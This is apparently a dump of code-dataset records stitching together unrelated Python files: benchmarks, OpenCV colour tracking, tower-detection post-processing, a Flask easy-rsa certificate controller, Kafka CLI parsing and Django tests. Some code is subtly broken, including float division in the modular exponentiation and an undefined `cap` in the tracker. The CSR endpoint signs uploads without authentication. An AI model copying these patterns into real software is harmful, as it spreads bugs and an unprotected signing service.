{\n 'matrix_json': matrix_json,\n 'names_json': names_json\n })\n return render(request, 'core/simple_upload.html')\n\n\ndef randomColor(n):\n color = [\"#\"+''.join([random.choice('0123456789ABCDEF') for j in range(6)])\n for i in range(n)]\n return color\n\n#clist = 
[\"#000000\",\"#800000\",\"#008000\",\"#808000\",\"#000080\",\"#800080\",\"#008080\",\"#c0c0c0\",\"#808080\",\"#ff0000\",\"#00ff00\",\"#ffff00\",\"#0000ff\",\"#ff00ff\",\"#00ffff\",\"#ffaf00\",\"#ffd7d7\",\"#d1fde9\",\"#B10DC9\",\"#FF4136\",\"#4f45c0\",\"#ffff66\",\"#c4c1ea\",\"#00cccc\",\"#7c9d45\",\"#57389f\"]\n#color= random.sample(clist, 15)","sub_path":"uploads/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"143956841","text":"# a^b (modulo c)\n# https://discuss.codechef.com/questions/20451/a-tutorial-on-fast-modulo-multiplication-exponential-squaring\ndef exponent(a,b,c):\n\tresult=1\n\tp=a\n\twhile b>0:\n\t\tif(b%2 == 1):\n\t\t\tresult=(result*p)%c\n\t\tp=(p*p)%c\n\t\tb=b/2\n\treturn result\n","sub_path":"Python/fast-modulo-exponentiation.py","file_name":"fast-modulo-exponentiation.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"364525387","text":"import torch\n\nfrom recsys_metrics.precision import precision\nfrom torchmetrics.functional import retrieval_precision\n\nfrom benchmark.benchmark import benchmark, benchmark_batch, sanity_check\n\n\n# ns = [128, 256, 512, 1024, 2048, 4096]\n# ks = [1, 50, 100]\ndef bench_precision_single(ns, ks, number=10_000, seed=42):\n def init_callback(n, k):\n torch.manual_seed(seed)\n preds = torch.rand(n)\n target = torch.randint(0, 2, size=(n,))\n return preds, target\n\n def base_callback(n, k, init_out):\n preds, target = init_out\n return retrieval_precision(preds, target, k=k)\n\n def our_callback(n, k, init_out):\n preds, target = init_out\n return precision(preds, target, k=k, reduction='mean')\n\n sanity_check(ns[-1], ks[-1], init_callback, base_callback, our_callback)\n\n df, g = benchmark(ns, ks, init_callback, base_callback, our_callback, number=number)\n g.fig.subplots_adjust(top=.88)\n g.fig.suptitle('Benchmark - Single Example: Precision', fontsize=16)\n return df, g\n\n# n=512,\n# k=50,\n# batch_sizes=[32, 64, 128, 256, 512],\ndef bench_precision_batch(n, k, batch_sizes, number=1_000, seed=42):\n def init_callback(n, k, batch_size):\n torch.manual_seed(seed)\n preds = torch.rand(batch_size, n)\n target = torch.randint(0, 2, size=(batch_size, n))\n return preds, target\n\n def base_callback(n, k, init_out):\n preds, target = init_out\n out = torch.stack([\n retrieval_precision(_preds, _target, k=k)\n for _preds, _target in zip(preds, target)\n ]).mean(0)\n return out\n\n def our_callback(n, k, init_out):\n preds, target = init_out\n return precision(preds, target, k=k, reduction='mean')\n\n df, g = benchmark_batch(\n n=n,\n k=k,\n batch_sizes=batch_sizes,\n init_callback=init_callback,\n base_callback=base_callback,\n our_callback=our_callback,\n number=number\n )\n g.fig.subplots_adjust(top=.88)\n g.fig.suptitle('Benchmark - Mini-Batch: Precision', fontsize=16)\n return df, g\n","sub_path":"benchmark/precision.py","file_name":"precision.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312669051","text":"import numpy as np\nimport cv2\nimport math\n\ncam = cv2.VideoCapture(0)\n\ndef empty():\n pass\n\ncv2.namedWindow(\"HSV\")\ncv2.resizeWindow(\"HSV\",640,240)\ncv2.createTrackbar(\"Hue Min\", \"HSV\", 0, 179, empty)\ncv2.createTrackbar(\"Hue Max\", \"HSV\", 0, 179, empty)\ncv2.createTrackbar(\"Sat 
Min\", \"HSV\", 0, 255, empty)\ncv2.createTrackbar(\"Sat Max\", \"HSV\", 255, 255, empty)\ncv2.createTrackbar(\"Val Min\", \"HSV\", 0, 255, empty)\ncv2.createTrackbar(\"Val Max\", \"HSV\", 255, 255, empty)\n\ncv2.namedWindow(\"Trackbars\")\nhh='Max'\nhl='Min'\nwnd = 'Colorbars'\n\n\nwhile True:\n _, imgFrame = cam.read()\n hueF = cv2.cvtColor(imgFrame, cv2.COLOR_BGR2HSV)\n # EXIT\n\n h_min = cv2.getTrackbarPos(\"Hue Min\", \"HSV\")\n h_max = cv2.getTrackbarPos(\"Hue Max\", \"HSV\")\n s_min = cv2.getTrackbarPos(\"Sat Min\", \"HSV\")\n s_max = cv2.getTrackbarPos(\"Sat Max\", \"HSV\")\n v_min = cv2.getTrackbarPos(\"Val Min\", \"HSV\")\n v_max = cv2.getTrackbarPos(\"Val Max\", \"HSV\")\n\n lower = np.array([h_min, s_min, v_min], np.uint8)\n upper = np.array([h_max, s_max, v_max], np.uint8)\n mask = cv2.inRange(hueF, lower, upper)\n kernal = np.ones((5, 5), \"uint8\")\n\n mask2 = cv2.dilate(mask, kernal)\n res = cv2.bitwise_and(imgFrame, imgFrame, mask=mask2)\n\n # # Define the red threshold & apply mask\n # redLow = np.array([136, 87, 111], np.uint8)\n # redHigh = np.array([180, 255, 255], np.uint8)\n # redMask = cv2.inRange(hueF, redLow, redHigh)\n\n cv2.imshow(\"orig\", imgFrame)\n #cv2.imshow(\"hsv\", hueF)\n #cv2.imshow(\"mask\", mask2)\n cv2.imshow(\"res\", res)\n\n contours, hierarchy = cv2.findContours(mask2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # detect red\n for pic, contour in enumerate(contours):\n area = cv2.contourArea(contour)\n #\n # if (area > 300):\n # x, y, w, h = cv2.boundingRect(contour)\n # imgFrame = cv2.rectangle(imgFrame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n #\n # cv2.putText(imgFrame, \"Color\", (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255))\n\n M = cv2.moments(contour)\n\n if M[\"m00\"] > 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n # Use contour if size is bigger then 1000 and smaller then 50000\n if area > 1000:\n if area < 50000:\n x, y, w, h = cv2.boundingRect(contour)\n approx = cv2.approxPolyDP(contour, 0.001 * cv2.arcLength(contour, True), True)\n # draw contour\n cv2.drawContours(imgFrame, contour, -1, (0, 255, 0), 3)\n # draw circle on center of contour\n # cv2.circle(imgFrame, (cX, cY), 7, (255, 255, 255), -1)\n # perimeter = cv2.arcLength(contour, True)\n # approx = cv2.approxPolyDP(contour, 0.04 * perimeter, True)\n # # fit elipse\n # _, _, angle = cv2.fitEllipse(contour)\n # P1x = cX\n # P1y = cY\n # length = 35\n #\n # # calculate vector line at angle of bounding box\n # P2x = int(P1x + length * math.cos(math.radians(angle)))\n # P2y = int(P1y + length * math.sin(math.radians(angle)))\n # # draw vector line\n # cv2.line(imgFrame, (cX, cY), (P2x, P2y), (255, 255, 255), 5)\n #\n # # output center of contour\n # print(angle)\n\n # detect bounding box\n rect = cv2.minAreaRect(contour)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n # draw bounding box\n cv2.drawContours(imgFrame, [box], 0, (0, 0, 255), 2)\n cv2.putText(imgFrame, \"Points: \" + str((x, y)), (x + w + 20, y + 20),\n cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 255, 0), 2)\n\n # EXIT\n cv2.imshow(\"multiple colors\", imgFrame)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break","sub_path":"tag-bot-main/FINAL_CODE/PyCVCode/Final/ColorTest.py","file_name":"ColorTest.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"401686101","text":"import os\nimport scipy.misc\nimport sis_utils\nimport ersa_utils\nfrom rst_utils 
import misc_utils\nfrom evaluate_utils import local_maxima_suppression\nfrom post_processing_utils import get_edge_info, connect_lines, prune_lines, prune_towers, \\\n visualize_results, towers_online, linked_length, break_lines, get_samples_between, load_model, \\\n run_inference_for_single_image, get_tower_truth_pred, update_connected_pairs\n\ncity_list = ['AZ_Tucson', 'KS_Colwich_Maize', 'NC_Clyde', 'NC_Wilmington']\n\n\ndef load_data(dirs, model_name, city_id, tile_id, merge_range=100):\n conf_dict = {0: 2, 1: 1, 2: 0, 3: 3}\n pred_file_name = os.path.join(dirs['task'], model_name + '_v2', 'USA_{}_{}.txt'.format(city_list[city_id], tile_id))\n preds = ersa_utils.load_file(pred_file_name)\n raw_rgb = ersa_utils.load_file(os.path.join(dirs['raw'], 'USA_{}_{}.tif'.format(city_list[city_id], tile_id)))\n conf_img = ersa_utils.load_file(os.path.join(dirs['conf'].format(conf_dict[city_id]),\n '{}{}.png'.format(city_list[city_id].split('_')[1], tile_id)))\n line_gt = ersa_utils.load_file(os.path.join(dirs['line'], '{}{}_GT.png'.format(city_list[city_id].split('_')[1],\n tile_id)))\n tower_gt = get_tower_truth_pred(dirs, city_id, tile_id)\n tower_pred, tower_conf, _ = local_maxima_suppression(preds, th=merge_range)\n conf_img = scipy.misc.imresize(conf_img, line_gt.shape)\n return preds, raw_rgb, conf_img, line_gt, tower_gt, tower_pred, tower_conf\n\n\nif __name__ == '__main__':\n # directories\n img_dir, task_dir = sis_utils.get_task_img_folder()\n ersa_utils.make_dir_if_not_exist(os.path.join(img_dir, 'new_annotation'))\n dirs = {\n 'task': task_dir,\n 'image': os.path.join(img_dir, 'new_annotation'),\n 'raw': r'/home/lab/Documents/bohao/data/transmission_line/raw2',\n 'conf': r'/media/ei-edl01/user/bh163/tasks/2018.11.16.transmission_line/confmap_uab_UnetCrop_linesv3_city0_'\n r'pw50_0_PS(572, 572)_BS5_EP100_LR0.0001_DS80_DR0.1_SFN32',\n 'line': r'/media/ei-edl01/data/uab_datasets/lines_v3/data/Original_Tiles'\n }\n\n # settings\n merge_range = 100\n radius = [1500]\n width = 5\n th = 8\n step = 5\n patch_size = (500, 500)\n for model_name in ['faster_rcnn']:\n model_list_1 = [\n '{}_Tucson_2019-06-30_12-51-03'.format(model_name),\n '{}_Colwich_2019-07-01_10-47-22'.format(model_name),\n '{}_NZ_2019-07-01_18-33-39'.format(model_name),\n ]\n\n model_list_2 = [\n '{}_Tucson_2019-07-03_00-05-04'.format(model_name),\n '{}_Colwich_2019-07-03_00-04-11'.format(model_name),\n '{}_NZ_2019-07-01_18-33-39'.format(model_name),\n ]\n\n model_list_3 = [\n '{}_Tucson_2019-07-02_14-53-17'.format(model_name),\n '{}_Colwich_2019-07-02_18-10-38'.format(model_name),\n '{}_NZ_2019-07-01_18-33-39'.format(model_name),\n ]\n\n if model_name == 'faster_rcnn':\n model_list = model_list_1\n elif model_name == 'faster_rcnn_res101':\n model_list = model_list_2\n elif model_name == 'faster_rcnn_res50':\n model_list = model_list_3\n\n '''model_list = [\n '{}_2019-02-12_09-30-35'.format(model_name),\n '{}_2019-02-12_09-33-08'.format(model_name),\n '{}_2019-02-12_09-34-45'.format(model_name),\n '{}_2019-02-12_09-36-15'.format(model_name),\n ]'''\n '''model_list = [\n '{}_2019-02-12_09-30-35'.format(model_name),\n '{}_2019-02-12_09-33-08'.format(model_name),\n '{}_2019-02-12_09-34-45'.format(model_name),\n '{}_2019-02-12_09-36-15'.format(model_name),\n ]'''\n model_id = 25000\n gpu = 1\n\n for city_id in range(2):\n detection_graph, category_index = load_model(model_list[city_id], model_id, gpu)\n for tile_id in [1, 2, 3]:\n print('Evaluating city {} tile {}'.format(city_id, tile_id))\n\n # load data\n preds, raw_rgb, 
conf_img, line_gt, tower_gt, tower_pred, tower_conf = \\\n load_data(dirs, model_name, city_id, tile_id, merge_range=merge_range)\n\n # get line confidences\n connected_pairs, connected_towers, unconnected_towers = None, None, None\n for r in radius:\n tower_pairs, tower_dists, line_confs = \\\n get_edge_info(tower_pred, conf_img, radius=r, width=width,\n tile_min=(0, 0), tile_max=raw_rgb.shape)\n\n # connect lines\n connected_pairs = connect_lines(tower_pairs, line_confs, th, cut_n=2)\n connected_pairs, unconnected_pairs = prune_lines(connected_pairs, tower_pred)\n\n # get towers that are not connected\n connected_towers, unconnected_towers = prune_towers(connected_pairs, tower_pred)\n\n # search line\n try:\n connected_towers, unconnected_towers, connected_pairs = \\\n towers_online(tower_pred, connected_towers, unconnected_towers, connected_pairs)\n except ValueError:\n pass\n\n # update towers\n break_lines(connected_pairs, tower_pred)\n # tower_pred = [tower_pred[a] for a in connected_towers]\n # tower_conf = [tower_conf[a] for a in connected_towers]\n\n # check the connection length\n line_length_list, attention_pair = linked_length(tower_pred, connected_pairs, dirs, city_id, tile_id)\n for ap in attention_pair:\n pred = []\n for sample_patch, top_left in get_samples_between(raw_rgb, tower_pred[ap[0]], tower_pred[ap[1]], step, patch_size):\n # Actual detection.\n output_dict = run_inference_for_single_image(sample_patch, detection_graph)\n\n for db, dc, ds in zip(output_dict['detection_boxes'], output_dict['detection_classes'],\n output_dict['detection_scores']):\n left = int(db[1] * patch_size[1]) + top_left[1]\n top = int(db[0] * patch_size[0]) + top_left[0]\n right = int(db[3] * patch_size[1]) + top_left[1]\n bottom = int(db[2] * patch_size[0]) + top_left[0]\n confidence = ds\n class_name = category_index[dc]['name']\n if confidence > 0.5:\n pred.append('{} {} {} {} {} {}\\n'.format(class_name, confidence, left, top, right, bottom))\n center_list, conf_list, _ = local_maxima_suppression(pred, th=20)\n tower_pred.extend(center_list)\n tower_conf.extend(conf_list)\n\n tower_pairs, tower_dists, line_confs = \\\n get_edge_info(tower_pred, conf_img, radius=radius[-1], width=width,\n tile_min=(0, 0), tile_max=raw_rgb.shape)\n\n # connect lines\n connected_pairs = connect_lines(tower_pairs, line_confs, th, cut_n=2)\n connected_pairs, unconnected_pairs = prune_lines(connected_pairs, tower_pred)\n\n # get towers that are not connected\n connected_towers, unconnected_towers = prune_towers(connected_pairs, tower_pred)\n\n # search line\n try:\n connected_towers, unconnected_towers, connected_pairs = \\\n towers_online(tower_pred, connected_towers, unconnected_towers, connected_pairs)\n except ValueError:\n pass\n\n # update towers\n '''break_lines(connected_pairs, tower_pred)\n connected_pairs = update_connected_pairs(connected_pairs, tower_pred, connected_towers)\n tower_pred = [tower_pred[a] for a in connected_towers]\n tower_conf = [tower_conf[a] for a in connected_towers]\n\n assert len(tower_pred) == len(tower_conf)\n save_file_name = os.path.join(task_dir, 'post_{}_{}_{}_pred_v2.npy'.format(model_name, city_id, tile_id))\n misc_utils.save_file(save_file_name, tower_pred)\n save_file_name = os.path.join(task_dir, 'post_{}_{}_{}_conf_v2.npy'.format(model_name, city_id, tile_id))\n misc_utils.save_file(save_file_name, tower_conf)\n save_file_name = os.path.join(task_dir, 'post_{}_{}_{}_conn_v2.npy'.format(model_name, city_id, tile_id))\n misc_utils.save_file(save_file_name, 
connected_pairs)'''\n\n # visualize results\n visualize_results(dirs['image'], city_id, tile_id, raw_rgb, line_gt, tower_pred, tower_gt, connected_pairs,\n connected_towers, unconnected_towers, save_fig=True, post_str='_{}'.format(model_name), close_file=True)\n","sub_path":"]tasks/2019.02.11.tower_evaluate/iterative_post_processing_v2.py","file_name":"iterative_post_processing_v2.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"76800095","text":"import os, sys\nimport pexpect\nimport threading\nimport time\nimport subprocess\nfrom bson.objectid import ObjectId\nfrom pathlib import Path\nfrom flask import request, send_from_directory\nfrom flask_restplus import Resource\n\nfrom app.main.model.database import *\nfrom ..util.dto import CertDto\nfrom ..util.errors import *\nfrom ..config import get_config\n\napi = CertDto.api\ncert_key = CertDto.cert_key\n\nUPLOAD_DIR = Path(get_config().UPLOAD_ROOT)\n\nif os.name == 'nt':\n EASY_RSA_PATH = Path('..') / 'easy-rsa' / 'Windows'\n KEYS_PATH = EASY_RSA_PATH / 'keys'\n LINE_BEGIN = ''\n LINE_END = os.linesep * 2\nelif os.name == 'posix':\n EASY_RSA_PATH = Path('..') / 'easy-rsa' / 'Linux'\n KEYS_PATH = EASY_RSA_PATH / 'keys'\n LINE_BEGIN = './'\n LINE_END = os.linesep\nelse:\n print('Unsupported platform')\n sys.exit(1)\n\ndef is_file_valid(file):\n return os.path.exists(file) and os.path.getsize(file) > 0\n\ndef get_pexpect_child():\n if os.name == 'nt':\n from pexpect import popen_spawn\n\n shell = 'cmd.exe'\n child = popen_spawn.PopenSpawn(shell)\n child.expect('>')\n child.sendline('chcp 65001')\n child.expect(LINE_END)\n elif os.name == 'posix':\n shell = '/bin/bash'\n child = pexpect.spawn(shell)\n\n return child\n\nclass build_keys(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n if not is_file_valid(KEYS_PATH / 'ca.key') or not is_file_valid(KEYS_PATH / 'ca.crt'):\n print('Start to build CA key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 'build-ca')\n child.expect(']:', timeout=30) # Country Name\n child.send('\\n')\n\n child.expect(']:') # State or Province Name\n child.sendline()\n\n child.expect(']:') # Locality Name\n child.sendline()\n\n child.expect(']:') # Organization Name\n child.sendline()\n\n child.expect(']:') # Organizational Unit Name\n child.sendline()\n\n child.expect(']:') # Common Name\n child.sendline('OpenVPN-CA')\n\n child.expect(']:') # Name\n child.sendline()\n\n child.expect(']:') # Email Address\n child.sendline()\n child.expect(os.linesep, timeout=30) # only one line feed works on Windows\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'ca.key') and is_file_valid(KEYS_PATH / 'ca.crt'):\n print('Succeeded to build CA key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build CA key')\n\n if not is_file_valid(KEYS_PATH / 'ta.key'):\n print('Start to build TA key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 
'build-ta')\n child.expect(LINE_END, timeout=30)\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'ta.key'):\n print('Succeeded to build TA key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build TA key')\n\n if not is_file_valid(KEYS_PATH / 'server.key') or not is_file_valid(KEYS_PATH / 'server.crt'):\n print('Start to build server key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 'build-key-server server')\n child.expect(']:', timeout=30) # Country Name\n child.send('\\n')\n\n child.expect(']:') # State or Province Name\n child.sendline()\n\n child.expect(']:') # Locality Name\n child.sendline()\n\n child.expect(']:') # Organization Name\n child.sendline()\n\n child.expect(']:') # Organizational Unit Name\n child.sendline()\n\n child.expect(']:') # Common Name\n child.sendline('server')\n\n child.expect(']:') # Name\n child.sendline()\n\n child.expect(']:') # Email Address\n child.sendline()\n\n child.expect(']:') # A challenge password\n child.send('\\n') # don't know why only '\\n' works\n\n child.expect(']:') # An optional company name\n child.sendline()\n\n child.expect(r'\\[y/n\\]:')\n child.sendline('y')\n\n try:\n child.expect('\\[y/n\\]', timeout=2)\n except pexpect.exceptions.TIMEOUT:\n print('Signing certificate failed possibly due to repeated CSR requests')\n child.sendline('y')\n\n child.expect(LINE_END, timeout=30)\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'server.key') and is_file_valid(KEYS_PATH / 'server.crt'):\n print('Succeeded to build server key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build server key')\n\n if not is_file_valid(KEYS_PATH / 'dh2048.pem'):\n print('Start to build DH key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n child.sendline(LINE_BEGIN + 'build-dh')\n child.expect(LINE_END, timeout=600)\n\n time.sleep(1)\n child.kill(9)\n\n if is_file_valid(KEYS_PATH / 'dh2048.pem'):\n print('Succeeded to build DH key, time consumed: {}'.format(time.time() - start))\n else:\n print('Failed to build DH key')\n\nif not 'thread' in globals():\n thread = build_keys()\n thread.daemon = True\n thread.start()\n\n@api.route('/csr')\nclass certificate_signing_request(Resource):\n @api.doc('certificate signing request')\n def post(self):\n \"\"\"\n Certificate signing request\n \"\"\"\n filename = None\n for name, file in request.files.items():\n if file.filename.endswith('.csr'):\n temp_id = str(ObjectId())\n filename = KEYS_PATH / (temp_id + '.csr')\n # file.save(str(filename))\n file.save(str(filename))\n break\n\n if filename:\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n child.sendline('source vars')\n child.expect(LINE_END)\n\n if not is_file_valid(KEYS_PATH / 'ca.key'):\n return 'CA not found', 404\n\n cert_name = os.path.basename(filename).split('.')[0]\n child.sendline(LINE_BEGIN + 'sign-req {}'.format(cert_name))\n 
child.expect(r'\\[y/n\\]:')\n child.sendline('y')\n\n try:\n child.expect('\\[y/n\\]', timeout=2)\n except pexpect.exceptions.TIMEOUT:\n return 'Signing certificate failed possibly due to repeated CSR requests', 404\n child.sendline('y')\n\n child.expect(LINE_END)\n\n return send_from_directory(Path(os.getcwd()) / os.path.dirname(filename), cert_name + '.crt')\n return 'CSR request is invalid', 404\n\n@api.route('/ca')\nclass certificate_authority_request(Resource):\n @api.doc('certificate authority request')\n def get(self):\n \"\"\"\n Certificate authority request\n \"\"\"\n if not is_file_valid(KEYS_PATH / 'ca.key'):\n return 'CA not found', 404\n\n return send_from_directory(Path(os.getcwd()) / KEYS_PATH, 'ca.crt')\n","sub_path":"webrobot/app/main/controller/cert_controller.py","file_name":"cert_controller.py","file_ext":"py","file_size_in_byte":8911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371536436","text":"import configparser\nimport logging\nfrom os import getpid\nfrom pathlib import Path\nfrom socket import gethostname\n\nimport configargparse\n\n\nclass VersionArgParser(configargparse.ArgumentParser):\n def error(self, message: str):\n \"\"\"\n Override the default implementation so nothing gets printed to screen\n \"\"\"\n raise RuntimeError(\"Did not ask for --version\")\n\n def _print_message(self, message: str, file: None = None):\n \"\"\"\n Override the default implementation so nothing gets printed to screen\n \"\"\"\n raise RuntimeError(\"Did not ask for --version\")\n\n\ndef get_version() -> str:\n \"\"\"\n Gets the current version from the setup.cfg file\n \"\"\"\n config = configparser.ConfigParser()\n path = Path(__file__).parent.parent / \"setup.cfg\"\n config.read(path)\n return str(config[\"metadata\"][\"version\"])\n\n\ndef _print_version_if_requested():\n version_arg_parser = VersionArgParser()\n version_arg_parser.add_argument(\n \"--version\",\n required=True,\n action=\"store_true\",\n help=\"Print application version and exit\",\n env_var=\"VERSION\",\n )\n try:\n version_arg_parser.parse_args()\n print(get_version())\n exit()\n except RuntimeError:\n pass\n\n\ndef parse_args():\n _print_version_if_requested()\n\n parser = configargparse.ArgumentParser(\n description=\"Forwards EPICS PVs to Apache Kafka. 
Part of the ESS data streaming pipeline.\"\n )\n parser.add_argument(\n \"--version\",\n action=\"store_true\",\n help=\"Print application version and exit\",\n env_var=\"VERSION\",\n )\n parser.add_argument(\n \"--config-topic\",\n required=True,\n help=\" Kafka broker/topic to listen for commands\",\n type=str,\n env_var=\"CONFIG_TOPIC\",\n )\n parser.add_argument(\n \"--status-topic\",\n required=True,\n help=\" Kafka broker/topic to publish status updates on\",\n type=str,\n env_var=\"STATUS_TOPIC\",\n )\n parser.add_argument(\n \"--output-broker\",\n required=True,\n help=\" Kafka broker to forward data into\",\n type=str,\n env_var=\"OUTPUT_BROKER\",\n )\n parser.add_argument(\n \"--storage-topic\",\n required=False,\n help=\" Kafka broker/topic for storage of the \"\n \"last known forwarding details\",\n type=str,\n env_var=\"STORAGE_TOPIC\",\n )\n parser.add_argument(\n \"-s\",\n \"--skip-retrieval\",\n action=\"store_true\",\n help=\"Ignore the stored configuration on startup\",\n )\n parser.add_argument(\n \"--graylog-logger-address\",\n required=False,\n help=\" Log to Graylog\",\n type=str,\n env_var=\"GRAYLOG_LOGGER_ADDRESS\",\n )\n parser.add_argument(\n \"--grafana-carbon-address\",\n required=False,\n help=\" Address to the Grafana (Carbon) metrics server\",\n type=str,\n )\n parser.add_argument(\n \"--log-file\", required=False, help=\"Log filename\", type=str, env_var=\"LOG_FILE\"\n )\n parser.add_argument(\n \"-c\",\n \"--config-file\",\n required=False,\n is_config_file=True,\n help=\"Read configuration from an ini file\",\n env_var=\"CONFIG_FILE\",\n )\n parser.add_argument(\n \"--pv-update-period\",\n required=False,\n help=\"If set then PV value will be sent with this interval even if unchanged (units=milliseconds)\",\n env_var=\"PV_UPDATE_PERIOD\",\n type=int,\n )\n parser.add_argument(\n \"--service-id\",\n required=False,\n help='Identifier for this particular instance of the Forwarder, defaults to \"Forwarder..',\n default=f\"Forwarder.{gethostname()}.{getpid()}\",\n env_var=\"SERVICE_ID\",\n type=str,\n )\n parser.add_argument(\n \"--fake-pv-period\",\n required=False,\n help=\"Period for random generated PV updates when channel_provider_type is set to 'fake' (units=milliseconds)\",\n env_var=\"FAKE_PV_PERIOD\",\n type=int,\n default=1000,\n )\n log_choice_to_enum = {\n \"Trace\": logging.DEBUG,\n \"Debug\": logging.DEBUG,\n \"Warning\": logging.WARNING,\n \"Error\": logging.ERROR,\n \"Critical\": logging.CRITICAL,\n }\n parser.add_argument(\n \"-v\",\n \"--verbosity\",\n required=False,\n help=\"Set logging level\",\n choices=log_choice_to_enum.keys(),\n default=\"Error\",\n env_var=\"VERBOSITY\",\n )\n optargs = parser.parse_args()\n optargs.verbosity = log_choice_to_enum[optargs.verbosity]\n return optargs\n","sub_path":"forwarder/parse_commandline_args.py","file_name":"parse_commandline_args.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"303652643","text":"from gec_backend.controller import UserManager, SenManager, TypeManager\nfrom django.test import TestCase\n\n\n# Create your tests here.\n# !!! 
includes test for SenManager and TypeManager\nclass TestSenManager(TestCase):\n\n def setUp(self):\n err, self.user = UserManager.createUser(\"test1\", \"test\")\n self.assertEquals(err, \"succeed\")\n\n def testAddSen(self):\n \"\"\"\n test if addSentences function could run correctly\n \"\"\"\n print(\"======= test add\")\n err2, newsen = SenManager.addSentences(self.user.id, 'org sentence', 'correct sentence',\n ['spell', 'case', 'verb', 'replace'])\n self.assertEquals(err2, \"succeed\")\n for type in list(newsen.error_type.all()):\n print(type.type)\n err3, newsen = SenManager.addSentences(self.user.id, 'org sentence1', 'correct sentence1',\n ['spell', 'case', 'verb'])\n err4, lists = SenManager.getSentencesByUserID(self.user.id)\n self.assertEqual(err4, 'succeed')\n for l in lists:\n print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n\n err0, type = TypeManager.getTypeByName('spell', self.user.id)\n self.assertEqual(err0, 'succeed')\n print('newuser==============')\n err0, newuser = UserManager.createUser('ttt', 'ppp')\n err3, newsen = SenManager.addSentences(newuser.id, 'org sentence222', 'correct sentence222',\n ['spell', 'case', 'verb'])\n err, type = TypeManager.getTypeByName('spell', newuser.id)\n err5, resList = SenManager.getSentencesByTypeName('replace', self.user.id)\n self.assertEqual(err5, 'succeed')\n for l in resList:\n print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n err0, type = TypeManager.getTypeByName('spell', newuser.id)\n\n print(\"===\")\n err = TypeManager.updateType('spell', self.user.id, 10)\n err, lists = TypeManager.getTypeCntRank(self.user.id)\n for l in lists:\n print(l.type, l.error_counts)\n print(\"+++\")\n err, typelist = TypeManager.getTypeBySentence(newsen.id)\n for l in typelist:\n print(l.type)\n def testDel(self):\n print(\"======= test delete\")\n err2, newsen = SenManager.addSentences(self.user.id, 'org sentence', 'correct sentence',\n ['spell', 'case', 'verb', 'replace'])\n err3, newsen = SenManager.addSentences(self.user.id, 'org sentence1', 'correct sentence1',\n ['spell', 'case', 'verb'])\n\n err0, newuser = UserManager.createUser('ttt', 'ppp')\n err3, newsen1 = SenManager.addSentences(newuser.id, 'org sentence1', 'correct sentence1',\n ['spell', 'case', 'verb'])\n self.assertNotEqual(newsen1.id, newsen.id)\n err3 = SenManager.delSentences(newsen.id)\n self.assertEqual(err3, 'succeed')\n err4, sen = SenManager.getSentencesByID(newsen.id)\n self.assertNotEqual(err4, 'succeed')\n err4, lists = SenManager.getSentencesByUserID(newuser.id)\n self.assertEqual(err4, 'succeed')\n for l in lists:\n print(l.user.userName, l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n\n err4, lists = SenManager.getSentencesByUserID(self.user.id)\n self.assertEqual(err4, 'succeed')\n for l in lists:\n 